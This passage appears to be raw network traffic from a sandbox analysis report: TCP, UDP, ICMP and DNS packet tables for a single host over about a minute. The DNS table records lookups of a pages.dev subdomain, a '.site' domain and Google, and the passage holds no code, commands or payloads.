Sep 1, 2024 00:55:02.779928923 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.830524921 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.831593037 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.831891060 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.832499027 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.832518101 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.854120970 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.854315996 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.854337931 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.855390072 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.855526924 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.855802059 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.855854988 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.856036901 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.881349087 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.882251024 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.882261992 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.883325100 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.883538008 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.884340048 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.884399891 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.884605885 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.900496960 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.904514074 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.904526949 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.928497076 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.935796976 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.935806036 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.951515913 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.956760883 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.956821918 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.956971884 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.957346916 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.957371950 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.957453966 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.957536936 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.957628965 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.962276936 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.962296009 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.982640982 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.983174086 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983192921 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983201981 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983222008 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983231068 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983237982 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983262062 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.983274937 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983283997 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983306885 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.983313084 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.983330965 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.983544111 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.986725092 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.986741066 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:03.010060072 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.010103941 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.010225058 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.013957977 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.013988018 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.430522919 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.453129053 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.453150034 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.453511953 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.454612970 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.454796076 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.454875946 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.454931974 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.454973936 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.606945992 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.607031107 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.607078075 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.607983112 CEST	49798	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.608006001 CEST	443	49798	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.614577055 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.614609003 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.614675045 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.614916086 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:03.614928961 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:03.675088882 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.675396919 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.675421000 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.676455975 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.676515102 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.677000999 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.677069902 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.677139044 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.677145958 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.718111992 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.780401945 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780426025 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780432940 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780483961 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.780479908 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780504942 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780510902 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780539036 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.780570030 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:03.780571938 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.780623913 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.783371925 CEST	49799	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:55:03.783390045 CEST	443	49799	13.107.246.60	192.168.2.6
Sep 1, 2024 00:55:04.097970009 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.098275900 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:04.098294973 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.098738909 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.099282026 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:04.099343061 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.099478960 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:04.144496918 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.213316917 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.213438988 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:04.213500023 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:04.214263916 CEST	49801	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:04.214287043 CEST	443	49801	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:07.899492025 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:07.899539948 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:07.899630070 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:07.900384903 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:07.900403023 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.351911068 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.352591991 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.352623940 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.353033066 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.353532076 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.353601933 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.353852034 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.353965998 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.353991985 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.488137960 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.488636971 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.488698006 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.490207911 CEST	49803	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.490231991 CEST	443	49803	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.508872032 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.508917093 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.508977890 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.509496927 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.509509087 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.972919941 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.973262072 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.973274946 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.973613977 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.973952055 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:08.974176884 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:08.974180937 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:09.014420033 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:09.014431000 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:09.085644960 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:09.085717916 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:09.085946083 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:09.086815119 CEST	49804	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:09.086837053 CEST	443	49804	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:10.964514017 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:10.964554071 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:10.964653969 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:10.965717077 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:10.965730906 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:11.902801991 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:11.902873993 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:11.904705048 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:11.904717922 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:11.904942989 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:11.932367086 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:11.932648897 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:11.932662964 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:11.932780027 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:11.980508089 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:12.123850107 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:12.123936892 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:12.124002934 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:12.124375105 CEST	49805	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:12.124397993 CEST	443	49805	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:12.819473028 CEST	50603	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:12.825220108 CEST	53	50603	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:12.825284958 CEST	50603	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:12.825320959 CEST	50603	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:12.830108881 CEST	53	50603	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:13.277982950 CEST	53	50603	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:13.279468060 CEST	50603	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:13.284543991 CEST	53	50603	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:13.284603119 CEST	50603	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:33.790338993 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:33.790374994 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:33.794421911 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:33.794760942 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:33.794775963 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:34.431623936 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:34.431932926 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:34.431967020 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:34.432301044 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:34.432718039 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:34.432838917 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:34.483421087 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:36.527162075 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:36.527210951 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:36.527272940 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:36.528855085 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:36.528877974 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.332000971 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.332144976 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.333894968 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.333909035 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.334131002 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.335906029 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.336090088 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.336090088 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.336106062 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.376504898 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.514337063 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.514420033 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:37.514889002 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.518338919 CEST	50608	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:55:37.518362999 CEST	443	50608	40.113.103.199	192.168.2.6
Sep 1, 2024 00:55:41.983437061 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:55:41.983460903 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:55:44.423891068 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:44.423952103 CEST	443	50607	142.250.186.132	192.168.2.6
Sep 1, 2024 00:55:44.426716089 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:46.328672886 CEST	50607	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:55:46.328694105 CEST	443	50607	142.250.186.132	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 00:54:30.096218109 CEST	53	50742	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:31.268270969 CEST	56425	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:31.268408060 CEST	59849	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:31.280009031 CEST	53	56425	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:31.284708023 CEST	53	59849	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:31.334224939 CEST	53	53122	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:32.016089916 CEST	53	56048	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:33.283360958 CEST	55631	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:33.283710957 CEST	59029	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:33.294583082 CEST	53	55631	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:33.294718981 CEST	53	59029	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:33.738249063 CEST	57470	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:33.739942074 CEST	57070	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:33.744765997 CEST	53	57470	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:33.747549057 CEST	53	57070	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:34.258696079 CEST	53	61599	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:34.279620886 CEST	56839	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:34.281321049 CEST	49631	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:34.292238951 CEST	53	56839	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:34.293895006 CEST	53	49631	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:35.140753984 CEST	61096	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:35.142021894 CEST	56029	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:35.153295994 CEST	53	61096	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:35.156641960 CEST	53	56029	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:36.176887035 CEST	52875	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:36.177431107 CEST	54167	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:36.189239979 CEST	53	54167	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:36.190519094 CEST	53	52875	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:37.019294977 CEST	60294	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:37.020096064 CEST	58027	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:37.020256996 CEST	53	55926	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:37.030749083 CEST	53	60294	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:37.032146931 CEST	53	58027	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:38.291085005 CEST	64195	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:38.292041063 CEST	57303	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:38.310671091 CEST	53	57303	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:38.323896885 CEST	53	64195	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:38.619719982 CEST	55610	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:38.620124102 CEST	54312	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:38.626808882 CEST	53	55610	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:38.632158041 CEST	53	54312	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:39.242568970 CEST	54804	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:39.242999077 CEST	59818	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:39.249092102 CEST	53	54804	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:39.249772072 CEST	53	59818	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:39.532596111 CEST	51122	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:39.532927036 CEST	55340	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:39.543626070 CEST	53	51122	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:39.547626972 CEST	53	55340	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:48.760422945 CEST	53	53742	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:53.639015913 CEST	49805	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:53.640223980 CEST	62423	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:56.086211920 CEST	54514	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:56.086699009 CEST	52994	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:56.093658924 CEST	53	54514	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:56.109502077 CEST	53	52994	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:59.241662979 CEST	63473	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:59.241869926 CEST	55412	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:59.243803978 CEST	49226	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:59.244122028 CEST	49825	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:59.251461983 CEST	53	63838	1.1.1.1	192.168.2.6
Sep 1, 2024 00:54:59.430973053 CEST	49707	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:54:59.431199074 CEST	63869	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:00.207576990 CEST	56859	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:00.207577944 CEST	49339	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.560748100 CEST	61989	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.560983896 CEST	60666	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.569099903 CEST	53	61989	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:01.570194006 CEST	53	60666	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:01.593019009 CEST	55932	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.593323946 CEST	61939	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.600517988 CEST	53	55932	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:01.600543022 CEST	53	61939	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:01.714266062 CEST	63269	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:01.714416027 CEST	53534	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.202044964 CEST	57840	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.202873945 CEST	52907	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.252212048 CEST	61446	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.252661943 CEST	52335	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.259927034 CEST	53	61446	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:02.260185003 CEST	53	52335	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:02.280659914 CEST	55292	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.281024933 CEST	61011	53	192.168.2.6	1.1.1.1
Sep 1, 2024 00:55:02.287412882 CEST	53	55292	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:02.287974119 CEST	53	61011	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:07.748270988 CEST	53	51900	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:12.819061041 CEST	53	57674	1.1.1.1	192.168.2.6
Sep 1, 2024 00:55:29.229958057 CEST	53	55248	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 1, 2024 00:54:53.674715042 CEST	192.168.2.6	1.1.1.1	c28f	(Port unreachable)	Destination Unreachable
Sep 1, 2024 00:54:56.109555006 CEST	192.168.2.6	1.1.1.1	c269	(Port unreachable)	Destination Unreachable
Sep 1, 2024 00:55:00.231992960 CEST	192.168.2.6	1.1.1.1	c27d	(Port unreachable)	Destination Unreachable
Sep 1, 2024 00:55:01.469315052 CEST	192.168.2.6	1.1.1.1	c28d	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 00:54:31.268270969 CEST	192.168.2.6	1.1.1.1	0xa0cd	Standard query (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:31.268408060 CEST	192.168.2.6	1.1.1.1	0xe046	Standard query (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	65	IN (0x0001)	false
Sep 1, 2024 00:54:33.283360958 CEST	192.168.2.6	1.1.1.1	0x2bf9	Standard query (0)	fetchlnk.truesharingzone.site	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:33.283710957 CEST	192.168.2.6	1.1.1.1	0x7202	Standard query (0)	fetchlnk.truesharingzone.site	65	IN (0x0001)	false
Sep 1, 2024 00:54:33.738249063 CEST	192.168.2.6	1.1.1.1	0x5482	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:33.739942074 CEST	192.168.2.6	1.1.1.1	0xe926	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 1, 2024 00:54:34.279620886 CEST	192.168.2.6	1.1.1.1	0xf532	Standard query (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	A (IP address)	IN (0x0001)	false
